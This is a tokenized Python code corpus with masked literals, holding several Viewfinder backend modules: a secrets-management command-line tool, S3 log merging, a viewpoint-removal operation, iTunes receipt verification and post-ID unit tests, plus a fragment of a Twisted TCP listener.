<EOL> if values [ <NUM_LIT:0> ] == '<STR_LIT>' and len ( values ) > <NUM_LIT:1> : <EOL> for key in values [ <NUM_LIT:1> : ] : <EOL> self . isAuth ( self . inspector . isauth ( key ) ) <EOL> elif values [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> self . transport . loseConnection ( ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> except Exception as inst : <EOL> print type ( inst ) <EOL> print inst . args <EOL> print inst <EOL> print ( '<STR_LIT>' % self . peerAddr ) <EOL> return <EOL> def startListener ( interface , port , protocol ) : <EOL> factory = Factory ( ) <EOL> factory . protocol = protocol <EOL> return reactor . 
listenTCP ( int ( port ) , factory , interface = interface ) <EOL> startListener ( INSPECTOR_INTERFACE , INSPECTOR_PORT , InspectorReceiver ) <EOL> reactor . run ( ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import json <EOL> import logging <EOL> import sys <EOL> from tornado import ioloop , options <EOL> from viewfinder . backend . base import base_options <EOL> from viewfinder . backend . base import secrets , util <EOL> options . define ( '<STR_LIT>' , '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> options . define ( '<STR_LIT>' , '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> options . define ( '<STR_LIT>' , default = True , <EOL> help = '<STR_LIT>' ) <EOL> def _GetSecretsManager ( ) : <EOL> if options . options . shared : <EOL> return secrets . GetSharedSecretsManager ( ) <EOL> else : <EOL> return secrets . GetUserSecretsManager ( ) <EOL> def _ListSecrets ( io_loop ) : <EOL> """<STR_LIT>""" <EOL> for f in _GetSecretsManager ( ) . ListSecrets ( ) : <EOL> print '<STR_LIT>' % f <EOL> io_loop . stop ( ) <EOL> def _GetSecret ( io_loop , secret ) : <EOL> """<STR_LIT>""" <EOL> print '<STR_LIT>' % ( secret , _GetSecretsManager ( ) . GetSecret ( secret ) ) <EOL> io_loop . stop ( ) <EOL> def _PutSecret ( io_loop , secret ) : <EOL> """<STR_LIT>""" <EOL> _GetSecretsManager ( ) . PutSecret ( secret , sys . stdin . read ( ) ) <EOL> io_loop . stop ( ) <EOL> def _PutCryptKeyset ( io_loop , secret ) : <EOL> """<STR_LIT>""" <EOL> _GetSecretsManager ( ) . PutSecret ( secret , json . dumps ( secrets . CreateCryptKeyset ( secret ) ) ) <EOL> io_loop . stop ( ) <EOL> def _PutSigningKeyset ( io_loop , secret ) : <EOL> """<STR_LIT>""" <EOL> _GetSecretsManager ( ) . PutSecret ( secret , json . dumps ( secrets . CreateSigningKeyset ( secret ) ) ) <EOL> io_loop . stop ( ) <EOL> def _EncryptSecrets ( io_loop ) : <EOL> """<STR_LIT>""" <EOL> print '<STR_LIT>' <EOL> ex_sm = _GetSecretsManager ( ) <EOL> print '<STR_LIT>' <EOL> if options . options . shared : <EOL> new_sm = secrets . SecretsManager ( '<STR_LIT>' , options . options . domain , options . options . secrets_dir ) <EOL> else : <EOL> new_sm = secrets . 
SecretsManager ( '<STR_LIT:user>' , options . options . domain , options . options . user_secrets_dir ) <EOL> new_sm . Init ( should_prompt = True , query_twice = True ) <EOL> print '<STR_LIT>' <EOL> for secret in ex_sm . ListSecrets ( ) : <EOL> print '<STR_LIT>' % secret <EOL> new_sm . PutSecret ( secret , ex_sm . GetSecret ( secret ) ) <EOL> io_loop . stop ( ) <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> io_loop = ioloop . IOLoop . current ( ) <EOL> options . parse_command_line ( ) <EOL> def _OnException ( type , value , traceback ) : <EOL> logging . error ( '<STR_LIT>' % options . options . secrets_mode , exc_info = ( type , value , traceback ) ) <EOL> io_loop . stop ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> with util . ExceptionBarrier ( _OnException ) : <EOL> if options . options . secrets_mode == '<STR_LIT>' : <EOL> _ListSecrets ( io_loop ) <EOL> elif options . options . secrets_mode == '<STR_LIT>' : <EOL> _GetSecret ( io_loop , options . options . secret ) <EOL> elif options . options . secrets_mode == '<STR_LIT>' : <EOL> _PutSecret ( io_loop , options . options . secret ) <EOL> elif options . options . secrets_mode == '<STR_LIT>' : <EOL> _PutCryptKeyset ( io_loop , options . options . secret ) <EOL> elif options . options . secrets_mode == '<STR_LIT>' : <EOL> _PutSigningKeyset ( io_loop , options . options . secret ) <EOL> elif options . options . secrets_mode == '<STR_LIT>' : <EOL> _EncryptSecrets ( io_loop ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' % options . options . secrets_mode ) <EOL> io_loop . start ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . exit ( main ( ) ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import re <EOL> from tornado . util import import_object <EOL> TABLE_ALIAS_MAP = { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def GetTableClass ( class_name ) : <EOL> if class_name in TABLE_ALIAS_MAP : <EOL> qualified_name = TABLE_ALIAS_MAP [ class_name ] <EOL> else : <EOL> package_name = re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , class_name ) . lower ( ) <EOL> qualified_name = '<STR_LIT>' % ( package_name , class_name ) <EOL> if qualified_name is None : <EOL> return None <EOL> return import_object ( qualified_name ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> STOP_WORDS = set ( <EOL> """<STR_LIT>""" . split ( ) ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import time <EOL> import unittest <EOL> from functools import partial <EOL> from viewfinder . backend . base . testing import async_test <EOL> from viewfinder . backend . db . episode import Episode <EOL> from viewfinder . backend . db . photo import Photo <EOL> from viewfinder . backend . db . post import Post <EOL> from base_test import DBBaseTestCase <EOL> class PostTestCase ( DBBaseTestCase ) : <EOL> def testPostIdConstruction ( self ) : <EOL> """<STR_LIT>""" <EOL> def _RoundTripPostId ( original_episode_id , original_photo_id ) : <EOL> post_id = Post . ConstructPostId ( original_episode_id , original_photo_id ) <EOL> new_episode_id , new_photo_id = Post . DeconstructPostId ( post_id ) <EOL> self . assertEqual ( original_episode_id , new_episode_id ) <EOL> self . assertEqual ( original_photo_id , new_photo_id ) <EOL> _RoundTripPostId ( Episode . ConstructEpisodeId ( time . time ( ) , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> Photo . ConstructPhotoId ( time . time ( ) , <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> _RoundTripPostId ( Episode . ConstructEpisodeId ( time . time ( ) , <NUM_LIT:1> , ( <NUM_LIT> , '<STR_LIT>' ) ) , <EOL> Photo . ConstructPhotoId ( time . time ( ) , <NUM_LIT:1> , ( <NUM_LIT> , '<STR_LIT>' ) ) ) <EOL> _RoundTripPostId ( Episode . ConstructEpisodeId ( time . time ( ) , <NUM_LIT:1> , ( <NUM_LIT> , None ) ) , <EOL> Photo . ConstructPhotoId ( time . time ( ) , <NUM_LIT:1> , ( <NUM_LIT> , None ) ) ) <EOL> _RoundTripPostId ( Episode . ConstructEpisodeId ( time . time ( ) , <NUM_LIT> , ( <NUM_LIT> , '<STR_LIT>' ) ) , <EOL> Photo . ConstructPhotoId ( time . time ( ) , <NUM_LIT> , ( <NUM_LIT> , '<STR_LIT>' ) ) ) <EOL> def testPostIdOrdering ( self ) : <EOL> """<STR_LIT>""" <EOL> def _Compare ( episode_id1 , photo_id1 , episode_id2 , photo_id2 ) : <EOL> result = cmp ( episode_id1 , episode_id2 ) <EOL> if result == <NUM_LIT:0> : <EOL> result = cmp ( photo_id1 , photo_id2 ) <EOL> post_id1 = Post . 
ConstructPostId ( episode_id1 , photo_id1 ) <EOL> post_id2 = Post . ConstructPostId ( episode_id2 , photo_id2 ) <EOL> self . assertEqual ( cmp ( post_id1 , post_id2 ) , result ) <EOL> timestamp = time . time ( ) <EOL> episode_id1 = Episode . ConstructEpisodeId ( timestamp , <NUM_LIT:1> , ( <NUM_LIT> , None ) ) <EOL> episode_id2 = Episode . ConstructEpisodeId ( timestamp , <NUM_LIT:1> , ( <NUM_LIT> , None ) ) <EOL> photo_id1 = Photo . ConstructPhotoId ( timestamp , <NUM_LIT:1> , <NUM_LIT> ) <EOL> photo_id2 = Photo . ConstructPhotoId ( timestamp , <NUM_LIT:1> , <NUM_LIT> ) <EOL> _Compare ( episode_id1 , photo_id1 , episode_id2 , photo_id2 ) <EOL> episode_id1 = Episode . ConstructEpisodeId ( timestamp , <NUM_LIT> , <NUM_LIT:1> ) <EOL> episode_id2 = Episode . ConstructEpisodeId ( timestamp , <NUM_LIT> , <NUM_LIT:1> ) <EOL> photo_id1 = Photo . ConstructPhotoId ( timestamp , <NUM_LIT> , ( <NUM_LIT:1> , None ) ) <EOL> photo_id2 = Photo . ConstructPhotoId ( timestamp , <NUM_LIT> , ( <NUM_LIT:1> , None ) ) <EOL> _Compare ( episode_id1 , photo_id1 , episode_id2 , photo_id2 ) <EOL> episode_id1 = Episode . ConstructEpisodeId ( timestamp , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> episode_id2 = Episode . ConstructEpisodeId ( timestamp , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> photo_id1 = Photo . ConstructPhotoId ( timestamp , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> photo_id2 = Photo . ConstructPhotoId ( timestamp , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> _Compare ( episode_id1 , photo_id1 , episode_id2 , photo_id2 ) <EOL> episode_id1 = Episode . ConstructEpisodeId ( timestamp , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> episode_id2 = Episode . ConstructEpisodeId ( timestamp , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> photo_id1 = Photo . ConstructPhotoId ( timestamp , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> photo_id2 = Photo . ConstructPhotoId ( timestamp , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> _Compare ( episode_id1 , photo_id1 , episode_id2 , photo_id2 ) <EOL> episode_id1 = Episode . 
ConstructEpisodeId ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> episode_id2 = Episode . ConstructEpisodeId ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> photo_id1 = Photo . ConstructPhotoId ( <NUM_LIT:1> , <NUM_LIT:0> , ( <NUM_LIT:0> , None ) ) <EOL> photo_id2 = Photo . ConstructPhotoId ( <NUM_LIT:0> , <NUM_LIT:0> , ( <NUM_LIT:0> , None ) ) <EOL> _Compare ( episode_id1 , photo_id1 , episode_id2 , photo_id2 ) <EOL> episode_id1 = Episode . ConstructEpisodeId ( timestamp , <NUM_LIT:0> , ( <NUM_LIT:0> , '<STR_LIT:1>' ) ) <EOL> episode_id2 = Episode . ConstructEpisodeId ( timestamp , <NUM_LIT:0> , ( <NUM_LIT:0> , '<STR_LIT:2>' ) ) <EOL> photo_id1 = Photo . ConstructPhotoId ( timestamp , <NUM_LIT:0> , ( <NUM_LIT:0> , None ) ) <EOL> photo_id2 = Photo . ConstructPhotoId ( timestamp , <NUM_LIT:0> , ( <NUM_LIT:0> , None ) ) <EOL> _Compare ( episode_id1 , photo_id1 , episode_id2 , photo_id2 ) <EOL> episode_id1 = Episode . ConstructEpisodeId ( timestamp , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> episode_id2 = Episode . ConstructEpisodeId ( timestamp , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> photo_id1 = Photo . ConstructPhotoId ( timestamp , <NUM_LIT:0> , ( <NUM_LIT:0> , u'<STR_LIT>' ) ) <EOL> photo_id2 = Photo . ConstructPhotoId ( timestamp , <NUM_LIT:0> , ( <NUM_LIT:0> , u'<STR_LIT>' ) ) <EOL> _Compare ( episode_id1 , photo_id1 , episode_id2 , photo_id2 ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import cStringIO <EOL> import logging <EOL> import os <EOL> import re <EOL> import sys <EOL> from tornado import gen , options <EOL> from viewfinder . backend . base import main , retry <EOL> from viewfinder . backend . db import db_client <EOL> from viewfinder . backend . db . job import Job <EOL> from viewfinder . backend . logs import logs_util , log_merger <EOL> from viewfinder . backend . storage import store_utils <EOL> from viewfinder . backend . storage . object_store import ObjectStore <EOL> options . define ( '<STR_LIT>' , default = None , help = '<STR_LIT>' ) <EOL> options . define ( '<STR_LIT>' , default = True , help = '<STR_LIT>' ) <EOL> options . define ( '<STR_LIT>' , default = True , help = '<STR_LIT>' ) <EOL> options . define ( '<STR_LIT>' , type = bool , default = True , <EOL> help = '<STR_LIT>' ) <EOL> options . define ( '<STR_LIT>' , type = int , default = None , help = '<STR_LIT>' ) <EOL> kS3UploadRetryPolicy = retry . RetryPolicy ( max_tries = <NUM_LIT:5> , timeout = <NUM_LIT> , <EOL> min_delay = <NUM_LIT:1> , max_delay = <NUM_LIT:30> , <EOL> check_exception = retry . RetryPolicy . AlwaysRetryOnException ) <EOL> @ gen . engine <EOL> def ProcessFiles ( logs_store , merged_store , logs_paths , filenames , dry_run , callback ) : <EOL> """<STR_LIT>""" <EOL> processed_files = [ ] <EOL> day_instance_logs = { } <EOL> s3_base = logs_paths . MergedDirectory ( ) <EOL> @ gen . engine <EOL> def _AddEntry ( instance , entry , callback ) : <EOL> """<STR_LIT>""" <EOL> if not entry : <EOL> callback ( ) <EOL> return <EOL> parsed = logs_util . ParseLogLine ( entry ) <EOL> if not parsed : <EOL> callback ( ) <EOL> return <EOL> day , _ , _ , _ = parsed <EOL> day_log = None <EOL> if ( instance , day ) not in day_instance_logs : <EOL> day_instance_logs [ ( instance , day ) ] = log_merger . 
LocalLogMerge ( merged_store , [ day , instance ] , s3_base ) <EOL> day_log = day_instance_logs [ ( instance , day ) ] <EOL> yield gen . Task ( day_log . FetchExistingFromS3 ) <EOL> day_log = day_instance_logs [ ( instance , day ) ] <EOL> day_log . Append ( entry ) <EOL> callback ( ) <EOL> @ gen . engine <EOL> def _ProcessOneFile ( instance , contents , callback ) : <EOL> """<STR_LIT>""" <EOL> buf = cStringIO . StringIO ( contents ) <EOL> buf . seek ( <NUM_LIT:0> ) <EOL> entry = '<STR_LIT>' <EOL> while True : <EOL> line = buf . readline ( ) <EOL> if not line : <EOL> yield gen . Task ( _AddEntry , instance , entry ) <EOL> break <EOL> if line . startswith ( ( '<STR_LIT:U+0020>' , '<STR_LIT:\t>' ) ) or logs_util . ParseLogLine ( line ) is None : <EOL> entry += '<STR_LIT:U+0020>' + line . strip ( ) <EOL> else : <EOL> yield gen . Task ( _AddEntry , instance , entry ) <EOL> entry = line . strip ( ) <EOL> buf . close ( ) <EOL> callback ( ) <EOL> for filename in filenames : <EOL> instance = logs_paths . RawLogPathToInstance ( filename ) <EOL> assert instance <EOL> contents = '<STR_LIT>' <EOL> try : <EOL> contents = yield gen . Task ( logs_store . Get , filename ) <EOL> except Exception as e : <EOL> logging . error ( '<STR_LIT>' % ( filename , e ) ) <EOL> continue <EOL> logging . info ( '<STR_LIT>' % ( len ( contents ) , filename ) ) <EOL> yield gen . Task ( _ProcessOneFile , instance , contents ) <EOL> processed_files . append ( filename ) <EOL> for log in day_instance_logs . values ( ) : <EOL> log . FlushBuffer ( ) <EOL> for instance_day , log in day_instance_logs . iteritems ( ) : <EOL> log . Close ( ) <EOL> if not dry_run : <EOL> try : <EOL> yield gen . Task ( log . Upload ) <EOL> except Exception as e : <EOL> logging . error ( '<STR_LIT>' % ( instance_day , e ) ) <EOL> log . Cleanup ( ) <EOL> callback ( processed_files ) <EOL> @ gen . 
engine <EOL> def GetRawLogsFileList ( logs_store , logs_paths , marker , callback ) : <EOL> """<STR_LIT>""" <EOL> def _WantFile ( filename ) : <EOL> instance = logs_paths . RawLogPathToInstance ( filename ) <EOL> if instance is None : <EOL> logging . error ( '<STR_LIT>' % filename ) <EOL> return False <EOL> return not options . options . ec2_only or logs_util . IsEC2Instance ( instance ) <EOL> base_path = logs_paths . RawDirectory ( ) <EOL> marker = os . path . join ( base_path , marker ) if marker is not None else None <EOL> file_list = yield gen . Task ( store_utils . ListAllKeys , logs_store , prefix = base_path , marker = marker ) <EOL> files = [ f for f in file_list if _WantFile ( f ) ] <EOL> logging . info ( '<STR_LIT>' % ( len ( file_list ) , len ( files ) ) ) <EOL> callback ( files ) <EOL> @ gen . engine <EOL> def RunOnce ( callback ) : <EOL> """<STR_LIT>""" <EOL> dry_run = options . options . dry_run <EOL> logs_paths = logs_util . ServerLogsPaths ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if dry_run : <EOL> logging . warning ( '<STR_LIT>' ) <EOL> logs_store = ObjectStore . GetInstance ( logs_paths . SOURCE_LOGS_BUCKET ) <EOL> merged_store = ObjectStore . GetInstance ( logs_paths . MERGED_LOGS_BUCKET ) <EOL> files = yield gen . Task ( GetRawLogsFileList , logs_store , logs_paths , options . options . start_date ) <EOL> processed_files = yield gen . Task ( logs_util . GetRegistry , merged_store , logs_paths . ProcessedRegistryPath ( ) ) <EOL> if processed_files is None : <EOL> processed_files = [ ] <EOL> files_set = set ( files ) <EOL> processed_set = set ( processed_files ) <EOL> missing_files = list ( files_set . difference ( processed_set ) ) <EOL> missing_files . sort ( ) <EOL> to_process = missing_files <EOL> if options . options . max_files_to_process is not None : <EOL> to_process = missing_files [ <NUM_LIT:0> : options . options . max_files_to_process ] <EOL> logging . 
info ( '<STR_LIT>' % <EOL> ( len ( files ) , len ( processed_files ) , len ( missing_files ) , len ( to_process ) ) ) <EOL> if len ( missing_files ) == <NUM_LIT:0> : <EOL> logging . info ( '<STR_LIT>' ) <EOL> callback ( ) <EOL> return <EOL> merged_files = yield gen . Task ( ProcessFiles , logs_store , merged_store , logs_paths , to_process , dry_run ) <EOL> logging . info ( '<STR_LIT>' % <EOL> ( len ( files ) , len ( processed_files ) , len ( missing_files ) , len ( merged_files ) ) ) <EOL> processed_files . extend ( merged_files ) <EOL> processed_files . sort ( ) <EOL> if not dry_run : <EOL> yield gen . Task ( retry . CallWithRetryAsync , kS3UploadRetryPolicy , <EOL> logs_util . WriteRegistry , merged_store , logs_paths . ProcessedRegistryPath ( ) , processed_files ) <EOL> callback ( ) <EOL> @ gen . engine <EOL> def _Start ( callback ) : <EOL> """<STR_LIT>""" <EOL> client = db_client . DBClient . Instance ( ) <EOL> job = Job ( client , '<STR_LIT>' ) <EOL> if options . options . require_lock : <EOL> got_lock = yield gen . Task ( job . AcquireLock ) <EOL> if got_lock == False : <EOL> logging . warning ( '<STR_LIT>' ) <EOL> callback ( ) <EOL> return <EOL> try : <EOL> yield gen . Task ( RunOnce ) <EOL> finally : <EOL> yield gen . Task ( job . ReleaseLock ) <EOL> callback ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . exit ( main . InitAndRun ( _Start ) ) </s>
<s> """<STR_LIT>""" <EOL> __authors__ = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> import json <EOL> from tornado import gen <EOL> from viewfinder . backend . base . exceptions import PermissionError <EOL> from viewfinder . backend . db . accounting import AccountingAccumulator <EOL> from viewfinder . backend . db . follower import Follower <EOL> from viewfinder . backend . db . operation import Operation <EOL> from viewfinder . backend . db . viewpoint import Viewpoint <EOL> from viewfinder . backend . op . notification_manager import NotificationManager <EOL> from viewfinder . backend . op . viewfinder_op import ViewfinderOperation <EOL> class RemoveViewpointOperation ( ViewfinderOperation ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , client , user_id , viewpoint_id ) : <EOL> super ( RemoveViewpointOperation , self ) . __init__ ( client ) <EOL> self . _op = Operation . GetCurrent ( ) <EOL> self . _client = client <EOL> self . _user_id = user_id <EOL> self . _viewpoint_id = viewpoint_id <EOL> @ classmethod <EOL> @ gen . coroutine <EOL> def Execute ( cls , client , user_id , viewpoint_id ) : <EOL> """<STR_LIT>""" <EOL> yield RemoveViewpointOperation ( client , user_id , viewpoint_id ) . _RemoveViewpoint ( ) <EOL> @ gen . coroutine <EOL> def _RemoveViewpoint ( self ) : <EOL> """<STR_LIT>""" <EOL> lock = yield gen . Task ( Viewpoint . AcquireLock , self . _client , self . _viewpoint_id ) <EOL> try : <EOL> if not ( yield self . _Check ( ) ) : <EOL> return <EOL> self . _client . CheckDBNotModified ( ) <EOL> yield self . _Update ( ) <EOL> yield self . _Account ( ) <EOL> yield Operation . TriggerFailpoint ( self . _client ) <EOL> yield self . _Notify ( ) <EOL> finally : <EOL> yield gen . Task ( Viewpoint . ReleaseLock , self . _client , self . _viewpoint_id , lock ) <EOL> @ gen . coroutine <EOL> def _Check ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _follower = yield gen . Task ( Follower . Query , <EOL> self . _client , <EOL> self . _user_id , <EOL> self . 
_viewpoint_id , <EOL> None , <EOL> must_exist = False ) <EOL> if self . _follower is None : <EOL> raise PermissionError ( '<STR_LIT>' % <EOL> ( self . _user_id , self . _viewpoint_id ) ) <EOL> if self . _op . checkpoint is None : <EOL> if self . _follower . IsRemoved ( ) : <EOL> raise gen . Return ( False ) <EOL> yield self . _op . SetCheckpoint ( self . _client , { '<STR_LIT:state>' : '<STR_LIT>' } ) <EOL> raise gen . Return ( True ) <EOL> @ gen . coroutine <EOL> def _Update ( self ) : <EOL> """<STR_LIT>""" <EOL> yield self . _follower . RemoveViewpoint ( self . _client ) <EOL> @ gen . coroutine <EOL> def _Account ( self ) : <EOL> """<STR_LIT>""" <EOL> acc_accum = AccountingAccumulator ( ) <EOL> yield acc_accum . RemoveViewpoint ( self . _client , self . _user_id , self . _viewpoint_id ) <EOL> yield acc_accum . Apply ( self . _client ) <EOL> @ gen . coroutine <EOL> def _Notify ( self ) : <EOL> """<STR_LIT>""" <EOL> yield NotificationManager . NotifyRemoveViewpoint ( self . _client , self . _user_id , self . _viewpoint_id ) </s>
<s> """<STR_LIT>""" <EOL> import base64 <EOL> import json <EOL> import logging <EOL> import time <EOL> from tornado . httpclient import AsyncHTTPClient <EOL> from viewfinder . backend . base import secrets <EOL> class ITunesStoreError ( Exception ) : <EOL> pass <EOL> kViewfinderBundleId = '<STR_LIT>' <EOL> class VerifyResponse ( object ) : <EOL> JSON_ERROR = <NUM_LIT> <EOL> MALFORMED_RECEIPT_ERROR = <NUM_LIT> <EOL> SIGNATURE_ERROR = <NUM_LIT> <EOL> PASSWORD_ERROR = <NUM_LIT> <EOL> SERVER_UNAVAILABLE_ERROR = <NUM_LIT> <EOL> EXPIRED_ERROR = <NUM_LIT> <EOL> SANDBOX_ON_PROD_ERROR = <NUM_LIT> <EOL> PROD_ON_SANDBOX_ERROR = <NUM_LIT> <EOL> FINAL_ERRORS = set ( [ JSON_ERROR , MALFORMED_RECEIPT_ERROR , SIGNATURE_ERROR , <EOL> SANDBOX_ON_PROD_ERROR ] ) <EOL> NON_FINAL_ERRORS = set ( [ PASSWORD_ERROR , SERVER_UNAVAILABLE_ERROR , <EOL> PROD_ON_SANDBOX_ERROR ] ) <EOL> def __init__ ( self , orig_receipt , response_body ) : <EOL> self . orig_receipt = orig_receipt <EOL> self . response = json . loads ( response_body ) <EOL> def GetStatus ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . response [ '<STR_LIT:status>' ] <EOL> def IsValid ( self ) : <EOL> """<STR_LIT>""" <EOL> status = self . GetStatus ( ) <EOL> if status == <NUM_LIT:0> or status == VerifyResponse . EXPIRED_ERROR : <EOL> if self . GetBundleId ( ) != kViewfinderBundleId : <EOL> logging . warning ( '<STR_LIT>' , self . GetBundleId ( ) ) <EOL> return False <EOL> return True <EOL> elif status in VerifyResponse . FINAL_ERRORS : <EOL> return False <EOL> else : <EOL> raise ITunesStoreError ( '<STR_LIT>' % status ) <EOL> def GetLatestReceiptInfo ( self ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in self . response : <EOL> return self . response [ '<STR_LIT>' ] <EOL> elif '<STR_LIT>' in self . response : <EOL> return self . response [ '<STR_LIT>' ] <EOL> else : <EOL> return self . response [ '<STR_LIT>' ] <EOL> def GetBundleId ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . 
GetLatestReceiptInfo ( ) [ '<STR_LIT>' ] <EOL> def GetProductId ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . GetLatestReceiptInfo ( ) [ '<STR_LIT>' ] <EOL> def GetTransactionTime ( self ) : <EOL> """<STR_LIT>""" <EOL> time_ms = int ( self . GetLatestReceiptInfo ( ) [ '<STR_LIT>' ] ) <EOL> return float ( time_ms ) / <NUM_LIT:1000> <EOL> def GetExpirationTime ( self ) : <EOL> """<STR_LIT>""" <EOL> expires_ms = int ( self . GetLatestReceiptInfo ( ) [ '<STR_LIT>' ] ) <EOL> return float ( expires_ms ) / <NUM_LIT:1000> <EOL> def IsExpired ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . GetExpirationTime ( ) < time . time ( ) <EOL> def IsRenewable ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . response [ '<STR_LIT:status>' ] == <NUM_LIT:0> <EOL> def GetRenewalData ( self ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in self . response : <EOL> return base64 . b64decode ( self . response [ '<STR_LIT>' ] ) <EOL> else : <EOL> return self . orig_receipt <EOL> def GetOriginalTransactionId ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . GetLatestReceiptInfo ( ) [ '<STR_LIT>' ] <EOL> def GetRenewalTransactionId ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . GetLatestReceiptInfo ( ) [ '<STR_LIT>' ] <EOL> def ToString ( self ) : <EOL> return json . dumps ( dict ( orig_receipt = self . orig_receipt , <EOL> response = json . dumps ( self . response ) ) ) <EOL> @ classmethod <EOL> def FromString ( cls , s ) : <EOL> data = json . loads ( s ) <EOL> return cls ( data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] ) <EOL> class ITunesStoreClient ( object ) : <EOL> _SETTINGS = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } <EOL> _instance_map = dict ( ) <EOL> def __init__ ( self , environment = '<STR_LIT>' , http_client = None ) : <EOL> self . _settings = ITunesStoreClient . _SETTINGS [ environment ] <EOL> if http_client is None : <EOL> self . 
http_client = AsyncHTTPClient ( ) <EOL> else : <EOL> self . http_client = http_client <EOL> def VerifyReceipt ( self , receipt_data , callback ) : <EOL> """<STR_LIT>""" <EOL> def _OnFetch ( response ) : <EOL> response . rethrow ( ) <EOL> callback ( VerifyResponse ( receipt_data , response . body ) ) <EOL> request = { <EOL> '<STR_LIT>' : base64 . b64encode ( receipt_data ) , <EOL> '<STR_LIT:password>' : secrets . GetSecret ( '<STR_LIT>' ) , <EOL> } <EOL> self . http_client . fetch ( self . _settings [ '<STR_LIT>' ] , method = '<STR_LIT:POST>' , <EOL> body = json . dumps ( request ) , callback = _OnFetch ) <EOL> @ staticmethod <EOL> def Instance ( environment ) : <EOL> assert environment in ITunesStoreClient . _instance_map , '<STR_LIT>' % environment <EOL> return ITunesStoreClient . _instance_map [ environment ] <EOL> @ staticmethod <EOL> def SetInstance ( environment , itunes_client ) : <EOL> """<STR_LIT>""" <EOL> ITunesStoreClient . _instance_map [ environment ] = itunes_client <EOL> @ staticmethod <EOL> def ClearInstance ( environment ) : <EOL> """<STR_LIT>""" <EOL> del ITunesStoreClient . _instance_map [ environment ] </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import logging <EOL> import json <EOL> import os <EOL> import re <EOL> import time <EOL> import urllib <EOL> from viewfinder . backend . base import util , secrets <EOL> from viewfinder . backend . base . environ import ServerEnvironment <EOL> from viewfinder . backend . www import www_util <EOL> from tornado . ioloop import IOLoop <EOL> from tornado import httpclient , options , web <EOL> _GOOGLE_OAUTH2_DEVICECODE_URL = '<STR_LIT>' <EOL> _GOOGLE_OAUTH2_TOKEN_URL = '<STR_LIT>' <EOL> _GOOGLE_OAUTH2_SCOPES = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' <EOL> options . define ( '<STR_LIT>' , '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> options . define ( '<STR_LIT>' , False , help = '<STR_LIT>' ) <EOL> class ScenarioLoginError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class Scenario ( object ) : <EOL> """<STR_LIT>""" <EOL> _http_error_dict = { <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' } <EOL> def __init__ ( self , name , handler , frequency , description = None ) : <EOL> self . name = name <EOL> self . handler = handler <EOL> self . description = description <EOL> self . frequency = frequency <EOL> self . _timeout = None <EOL> def StartLoop ( self , device ) : <EOL> """<STR_LIT>""" <EOL> logger = logging . LoggerAdapter ( logging . getLogger ( ) , { '<STR_LIT>' : self . name } ) <EOL> def _OnComplete ( ) : <EOL> self . _timeout = IOLoop . current ( ) . add_timeout ( time . time ( ) + self . frequency , _RunIteration ) <EOL> def _OnException ( typ , val , tb ) : <EOL> if ( typ , val , tb ) != ( None , None , None ) : <EOL> if typ is web . HTTPError : <EOL> message = self . _http_error_dict . get ( val . status_code , <EOL> '<STR_LIT>' % <EOL> ( val . status_code , val . log_message ) ) <EOL> logger . error ( message ) <EOL> else : <EOL> logger . error ( '<STR_LIT>' , self . 
